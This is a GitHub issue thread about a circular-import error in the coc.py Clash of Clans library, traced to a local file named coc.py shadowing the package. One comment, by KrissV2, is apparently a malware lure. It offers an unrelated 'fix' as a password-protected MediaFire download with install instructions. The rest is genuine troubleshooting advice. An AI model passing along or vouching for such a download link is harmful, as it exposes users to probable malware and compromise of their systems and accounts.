### ISSUE TITLE
Coc.Utils import failing (circular import)

### ISSUE THREAD

**Issue by SouthernCure** [mathsman5133/coc.py#245]
Having trouble using coc.utils for some reason

```
if not coc.utils.is_valid_tag(tempTag):
AttributeError: partially initialized module 'coc' has no attribute 'utils' (most likely due to a circular import)

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\discord\app_commands\tree.py", line 1310, in _call
    await command._invoke_with_namespace(interaction, namespace)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\discord\app_commands\commands.py", line 883, in _invoke_with_namespace
    return await self._do_call(interaction, transformed_values)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\discord\app_commands\commands.py", line 876, in _do_call
    raise CommandInvokeError(self, e) from e
discord.app_commands.errors.CommandInvokeError: Command 'clashlogin' raised an exception: AttributeError: partially initialized module 'coc' has no attribute 'utils' (most likely due to a circular import)
```

**Comment by SouthernCure** [comment]
Was totally an idiot, mb

**Comment by doluk** [comment]
could you please just add what the problem was? Just in case somebody is finding it and doesn't figure it out on their own.😊

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Anubhav1603** [comment]
@SouthernCure have you named your file coc? ,because your error says circular imports

**Comment by SouthernCure** [comment]
Issue explained I am using a package called coc while also having another python script called coc.py to store functions. It was messing everything up, LOL; I'm creating a basic discord bot, which is on my GitHub if anyone needs some reference.

**Comment by Anubhav1603** [comment]
> Issue explained I am using a package called coc while also having another python script called coc.py to store functions. It was messing everything up, LOL; I'm creating a basic discord bot, which is on my GitHub if anyone needs some reference.

If you using coc.py then you cannot name your file coc instead name something else like main.py or something and try again to run your script

**Comment by SouthernCure** [comment]
Yeah, I already have a main.py and was going to save functions for clash of clans is coc.py, it's no big deal, I plan to redo it and give it another name anyways. Ill just make sure there's no overlap
